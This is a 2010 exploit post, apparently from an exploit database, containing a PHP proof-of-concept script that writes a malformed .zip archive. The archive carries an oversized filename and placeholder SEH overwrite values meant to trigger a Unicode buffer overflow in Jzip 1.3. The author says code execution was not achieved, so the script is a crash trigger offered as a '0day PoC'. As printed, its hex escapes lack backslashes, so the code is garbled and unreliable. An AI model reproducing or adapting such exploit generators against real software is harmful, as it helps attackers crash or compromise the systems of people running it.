Jzip v1.3 (.zip) Unicode buffer overflow 0day PoC
Posted on 06 April 2010
================================================= Jzip v1.3 (.zip) Unicode buffer overflow 0day PoC ================================================= <?php /* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Jzip v1.3 (.zip) Unicode buffer overflow 0day PoC Date: 6/4/2010 Author: mr_me (http://net-ninja.net/) Software Link: http://www.jzip.com/ Version: 1.3 Tested on: Windows XP SP3 En Advisory: http://www.corelan.be:8800/advisories.php?id=10-021 Greetz to: Corelan Security Team http://www.corelan.be:8800/index.php/security/corelan-team-members/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Note: jzip.exe and all associated modules are compiled with safeseh and combine that with the unicode limitation proves very difficult for exploitation. We did not find a working unicode address, otherwise this vulnerability would have been alot more fun! The seven moons were not aligned as Ben puts it :) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Script provided 'as is', without any warranty. Use for educational purposes only. Do not use this code to do anything illegal ! Note : you are not allowed to edit/modify this code. If you do, Corelan cannot be held responsible for any damages this may cause. */ $lf_header = "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00". "x00x00x00x00x00x00x00x00xe4x0fx00x00x00"; $cdf_header = "x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00". "x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00". "x24x00x00x00x00x00x00x00"; $efcdr_record = "x50x4Bx05x06x00x00x00x00x01x00x01x00". "x12x10x00x00x02x10x00x00x00x00"; $___offset = 4064; $___nseh = str_repeat("x43",2); $___seh = str_repeat("x44",2); $___exploit = str_repeat("x41",810). $___nseh. $___seh; $___exploit .= str_repeat("x41",$___offset-strlen($___exploit)). "x2ex74x78x74"; $_____b00m = $lf_header.$___exploit.$cdf_header.$___exploit.$efcdr_record; file_put_contents("cst-jzip.zip",$_____b00m); ?> # Inj3ct0r.com [2010-04-06]
